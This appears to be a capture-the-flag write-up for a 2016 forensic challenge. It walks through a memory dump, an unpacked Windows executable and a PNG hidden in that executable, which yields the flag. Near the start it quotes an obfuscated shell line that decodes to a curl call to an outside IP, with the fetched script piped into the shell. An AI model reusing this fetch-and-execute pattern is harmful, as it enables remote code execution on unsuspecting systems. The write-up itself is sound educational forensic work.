[Sharif University CTF 2016] [Forensic 400 – Memdump] Write Up

Description

We we trying to capture the flag too! But that’s what it left for us.

Resolution

We began to check the strings contained in the file:

$ strings memdump > memdump.txt

One line was very interesting:

echo KMWdyxGItMHI1QjLxgzMuUzMuUjMv4Udll0a0xGe|rev|openssl enc -a -d | rev | . /dev/stdin | cat /tmp/.XpUma5 - | display -

We tried the command on our side and got an URL:

$ echo KMWdyxGItMHI1QjLxgzMuUzMuUjMv4Udll0a0xGe|rev|openssl enc -a -d | rev
curl -s 54.183.53.52/NueIktlx

The URL wasn’t accessible anymore, but going to the parent directory of the website, we found a file “jKOpqo”.

Let’s check what kind of file it is:

$ file jKOpqo
jKOpqo: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows

Running this file on Windows gave us:

Mhh.. Nothing interesting, let’s debug it using IDA.
memdump-ida

Too bad, it’s a packed executable. We checked the signature using DiE:
memdump-die

ASPack packed executable is easy to dump using the plugin OllyDump.
We lauched OllyDbg and checked the entry point of the packed executable:
memdump-ollydbg

As the plugin has already set the correct value, we just had to dump the file.
memdump-ollydump

(For lazy people, you can also use an online decompiler like https://retdec.com.)

We then have a non-packed executable with a PNG embeded inside the .rsrc section:

;  section: .rsrc
0x403000:   00 00 00 00 00 00 00 00  00 00 00 00 01 00 00 00   |................|
0x403010:   58 00 00 80 18 00 00 80  00 00 00 00 00 00 00 00   |X...............|
0x403020:   00 00 00 00 01 00 00 00  62 00 00 80 30 00 00 80   |........b...0...|
0x403030:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 01 00   |................|
0x403040:   00 00 00 00 48 00 00 00  6c 30 00 00 b3 0e 00 00   |....H...l0......|
0x403050:   00 00 00 00 00 00 00 00  04 00 46 00 4c 00 41 00   |..........F.L.A.|
0x403060:   47 00 03 00 49 00 4d 00  47 00 00 00 89 50 4e 47   |G...I.M.G....PNG|
0x403070:   0d 0a 1a 0a 00 00 00 0d  49 48 44 52 00 00 02 58   |........IHDR...X|
0x403080:   00 00 02 58 08 03 00 00  00 89 b8 68 ee 00 00 03   |...X.......h....|
0x403090:   00 50 4c 54 45 00 00 00  01 01 01 02 02 02 03 03   |.PLTE...........|
0x4030a0:   03 04 04 04 05 05 05 06  06 06 07 07 07 08 08 08   |................|
[...]
0x403f00:   00 00 00 00 00 00 00 f8  ff f2 2f 3c 76 55 8c 15   |........../<vU..|
0x403f10:   4c 6c ec 00 00 00 00 49  45 4e 44 ae 42 60 82 00   |Ll.....IEND.B`..|
0x403f20:   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   |................|

PNG file format specifications says:

89 50 4e 47 |.PNG| //Header of a PNG file
[...]
49 45 4e 44 |IEND| //Ending chunk of a PNG
ae 42 60 82 |.B`.| //and its CRC.

Using regex and sed we got the following hexdump :

echo '89504e470d0a1a0a0000000d494844520000025800000258080300000089b868ee00000300504c54450000000101010202020303030404040505050606060707070808080909090a0a0a0b0b0b0c0c0c0d0d0d0e0e0e0f0f0f1010101111111212121313131414141515151616161717171818181919191a1a1a1b1b1b1c1c1c1d1d1d1e1e1e1f1f1f2020202121212222222323232424242525252626262727272828282929292a2a2a2b2b2b2c2c2c2d2d2d2e2e2e2f2f2f3030303131313232323333333434343535353636363737373838383939393a3a3a3b3b3b3c3c3c3d3d3d3e3e3e3f3f3f4040404141414242424343434444444545454646464747474848484949494a4a4a4b4b4b4c4c4c4d4d4d4e4e4e4f4f4f5050505151515252525353535454545555555656565757575858585959595a5a5a5b5b5b5c5c5c5d5d5d5e5e5e5f5f5f6060606161616262626363636464646565656666666767676868686969696a6a6a6b6b6b6c6c6c6d6d6d6e6e6e6f6f6f7070707171717272727373737474747575757676767777777878787979797a7a7a7b7b7b7c7c7c7d7d7d7e7e7e7f7f7f8080808181818282828383838484848585858686868787878888888989898a8a8a8b8b8b8c8c8c8d8d8d8e8e8e8f8f8f9090909191919292929393939494949595959696969797979898989999999a9a9a9b9b9b9c9c9c9d9d9d9e9e9e9f9f9fa0a0a0a1a1a1a2a2a2a3a3a3a4a4a4a5a5a5a6a6a6a7a7a7a8a8a8a9a9a9aaaaaaabababacacacadadadaeaeaeafafafb0b0b0b1b1b1b2b2b2b3b3b3b4b4b4b5b5b5b6b6b6b7b7b7b8b8b8b9b9b9babababbbbbbbcbcbcbdbdbdbebebebfbfbfc0c0c0c1c1c1c2c2c2c3c3c3c4c4c4c5c5c5c6c6c6c7c7c7c8c8c8c9c9c9cacacacbcbcbcccccccdcdcdcecececfcfcfd0d0d0d1d1d1d2d2d2d3d3d3d4d4d4d5d5d5d6d6d6d7d7d7d8d8d8d9d9d9dadadadbdbdbdcdcdcdddddddedededfdfdfe0e0e0e1e1e1e2e2e2e3e3e3e4e4e4e5e5e5e6e6e6e7e7e7e8e8e8e9e9e9eaeaeaebebebecececedededeeeeeeefefeff0f0f0f1f1f1f2f2f2f3f3f3f4f4f4f5f5f5f6f6f6f7f7f7f8f8f8f9f9f9fafafafbfbfbfcfcfcfdfdfdfefefeffffffe2b05d7d0000000274524e53ff00e5b7304a00000b6049444154789cedddcb92e3b81105d0f9ff9fa6ed5691c4ab266c6566c083386731a3526f72710304130ffdf517000000000000000000000000000000000000000000000000000000f0ffecda5d0007ba3e7697c161ae4bb2c8f71329c122d79d28c122d1fb08fc8c5b5b8be11c4dae2ecf43f2fc64e9ba83255944dd73ab66ee2e5984b5b3f6f7b36011d34648aec872f5c17abedc540ec7689375b5d32d086992e59590447db2e48a24d798acadd570087b1aa8f06c96912c12dd89fa59cad95d0ea768179f0d5ba4697b5882459aab4fd6ce5238c9d53d0bf7d6c2499e3cc915a99ef741b92283651c2a5cde07c9d74749aec8d12749aec8f11ec571d88b446dae1c4f25cb9b2ba31599fe1da67757c3ee623847d35f30629148aea8d14eb3206c5cc7912b328cbbafe48a0c63bf7d5f259cc43a0e358685e78d95708e71b62e5724e8cfa50a1539fa8ea8c72049aeb181b5b51a8e316e44de590bff745d73a1f9285744ac03245704dddb43afc597f0bd670b43f7955c11b5b8a956aec86084a2845c5143b2a8f1ace56cae83d3dc4d07c922d7d51c23843c969da92157842d22245784dd777d0c5f6dab8733f43b909faf3656c4095627e7e58aa8e76aa22e4b72454c932ba314899e1ebb6491ed59c1912c1235e7072fbbfac8e3fc20b5e48a0c5386e48ab8f9c127578459c8a1c27339517ff5c7c68a384297a7f12bf8d2f004fcf9b0a9184e612b0315e697c16da57094b9cbb0ad14ceb1ba4e665f359ce2de31da7eb3af1a4eb13e39b1ad1c0eb1d8c0205784cdcf41b922ee5ec769bf902ba2a614c915094cafa8b09a5f6d2b8663bcfb647657c2499ea7a064916a4c967891a34f96818bb87b7af5fca9cf4082294472458239447245dc3c3cc91571cea552e17e05b4c99d4cf3b954886b4fa34a16593e69ba6f45fef90c51cf04eb9ec11bb748f1264bbf9d4cedbaa05cf1bd6993e8cf978b7f82ffda2fcf3bb922e4efa6e872c5f7fe6effb15c116574a286de0235248b1a824515c1a284605142b0a8215924584cd6258bb0f522a16411f34b84248b905f03245844fc3e324916017f33620916df7bb61ffff20ff095f724cefcfd9682384497abc5cf5cc2979ac1a9fd01d53dc570123fef4c854bb048f29f3339ed5fee7227c3f822f8cbab21fc4fe61cc91571ab279f5c1166ae4e893b5072452a231625de114bb0c8a46d458d5f569e21a8cd95818b3c724596f52a8e5c1133c648aec8b01aa0a48aa8a677254de46927eb92459a765fbb6091e78d936491e86a93b5b310ce72791852e2f23024d1ea70b35c1135f6daa72fe10b8b551cb922ccfa2015aef91752c58a30eb835468732558a4912b0a891525b445296189903c5d7fe1f92057c4b4f32acb3864e9baebef65588245c8673db0fdd33a0e715384e48a048b08891561324405831335cca7a82259d4306a916abcfd6a5f259ca48b92e61549a61c4916091629922bc23cf9a860a1990acf0967c922d19d28c922d39b27c922cf4f9a2e3378723d13acfffc36fde73fbb4be208edd4dda8459e3b529fcf7245501f21bf6f498ed5e02457440dd329e315299e97c0f74fb922ec7d097cbf902ba29a3b19da64ed2b8823b4b9f22339a4710f2485c48a12edfc6a6b219c65683640807b20a9d0bf06ba07921c5d1bd48606925cee81a4c01421b922c17a9b8c5811234354303851c37c8a2a92450da31655448b1a9a5754912cc296e3935c11643d9012ef6532bb2be1248b735e10f7e449b2c8e4402a25fa9dc8924596c51e7748e09017359c4b25d3626e65c822683ce6e5be3e328cab38d675c8700de7076d952185735e9490214a0816253cf6282158d4f83355bf2e5d06925dbddde5f04f77b51f3fbf69295784ad1b583b2ae124ce7951619c4e7d26f0dbcae110eb95e78d057184a7c5d07f03213f291a92b5af1ecef004ca3045a26efbb16491e4790ebe3378e12241b33868bb2889ba7742b9224df74e2857847521922b522ca7537245d47ac3955c11f374db7717c2599e6efbe63a38cbdb6ddf5b07a769d607858b3c4d3f54b2c8d3464ab2c8d30c55824522c12255b701b9fb3f7cad9daa9b62916478057cf660edab8813ccc707751b48b03cee2c5684891135248b1a92450dc9a2c67b40756f1d9c465f941a775f74771d9c465b941a724598f38354b8160b82062ca2aef73699eebb8d2571803742f33e2cf85a775bdf9bac5de570181baf28e1403d152ec1224dff1ad8fd1fbeb6388e2358847593758f42920c6f817f9aa4062ca23ea1ea4f106a3710b5c8905c11264354902b4a78ea5144b428225ad4d05fa08a6491a60f92618b1c2ec0a2c22a44724594c1890ae653947062821ad3c954c8f0fc1cfde7c3ee7238c57ba39a672299aefb4635c122d34fa6fed21725d53bbf922bc28633133f1f3615c331bac149a048d23ff43e0708216a984c791d24c51824c122c7d80b952b523c6df6e73e19b922c1d52c105e72459a617d50aec8f1ac0fda32432aeb8394b03e4809eb83d41028524caf7f7f6659fbeae10c7367419f81b827426f96e48ab03e4ee327f852ff3b714fd77d67491ce4591afcfcb1bb1c4ea1754585667ab5b710ced26cbfda5c0947112c6abc2f84bb2be128f6f591623a2e285724780728e77148f49c94902652b5cb3792451e0b83d4b89e9338bb2be12ca658d4902b6adce7bc76d7c13f5f3b44dd9d2ca31651d71c2c8f43a2c610b99f810cab10c9157172458d55b2b614c2610c50d4902c6a481635de73139b0be13097fbfa2871ef1edd5d07a7b18e438639477245d862a559ae087bb6c6f43741ee2c8903bc216a3fc81531c3f6ab9f0f9b8ae118d3d46a5f291c649eb3efab85934c5d865d857098612bb26091647816ee2b84432c5e01cdb1085b9f9bd8520a07711e870a7388ec6720c16ad559ae089b7634881529ee3bd5e48954efbef66bba781bbed706cbb8459af77e51b922d33352c91599e48a34cb0313724588ce1515963d51d9226a9e51e9339060feed5db922ae3935387d055f9b83255764583c0ab7d5c241acdf50a36b378817699af682818bb0457f41ae08bbc6ce950d5824184264631f29a610fd19b23615c3310c4fd4f0e4a384d93a353e897af6216fae86637407080d5ca4795608e58a04edee18e771c8d22f0bca1539a6759c3f1fb695c321bad994918a24c3fbdf9fe9fbc67238c4fd0ed8fe6dd4226a9aabcb15199add7cc3371030e549ae4830dcce2057e4183b0d72458ee9fef67da57084d5091cb9226a3557972ba2da53cefa0c64b99ae33777c4e48aa8f5e941b922663e3d2857c4c91015e48a121e7b14112d6a98ac5345b648e427c3a9302449b44831c748b0885b8e4f724590851b2a3c77c8ec2e84a3bce707258b3cedbe3ec922cb704fd1de6238c7fd1c7c67f0c24586ebbe03f2f27a48a63b523f9fe58a24ed8109b922995c9161399b922b82c6735dee9321c5f312d8fc2d5784ad4ed1cb15514db7fdfd4aae885ade28b3ab18ceb10a16c4698752a2bf4746bcc8d2e5cac045d4fc635e76f811d7f717ec49264717a2ab9f68c1b7c610891519c488121e7cd4b8cf4cecae83c33831418de6c8c4fb3b0110d50e59462dd25ceff51f7245a267a4922bc2c66efbf01d7c655cc7d9580ae71826e9824586e9dd4f9f8114d308a5cf408ac59025572498b7caecaa84b38cb3f76d857018831435de73137bebe0344fbb5db288999b0c7245dcba7d2557c42c52245784adf6f1c91551cf3ed1f13b08785f01ed9621cfeab20fb922aab99bc83d90245ae50a92881515ba7bb07616c211dad7c0e7836011b4780d942bc216fd05b9226cd111f56a48d8b03ee8e20f52fcdc4c34266b63459cc05d1f54b8ccd629f03ef43cfe886b7f1ef5f3a789157143dbea0e957b3f0899da56efa56a462dbe379f9c3783276e951ee75209fb353e7245c81c20e31519964707e58ab0d56d7d72459c7b20a931276b53211c469228e1d94709b9a28417412ad8d94e8dc5555890e5d9d6b0b90e4ee32805354cb6a82157d4102b000000000000000000000000000000000000000000000000000000f8fff22f3c76558c154c6cec0000000049454e44ae426082' | xxd -r -p > FLAG.IMG

FLAG.IMG

SharifCTF{39057E5702F8167AA641CA9AD7E9A15E}

Flag was : “39057E5702F8167AA641CA9AD7E9A15E“.

Leave a Reply

Your email address will not be published. Required fields are marked *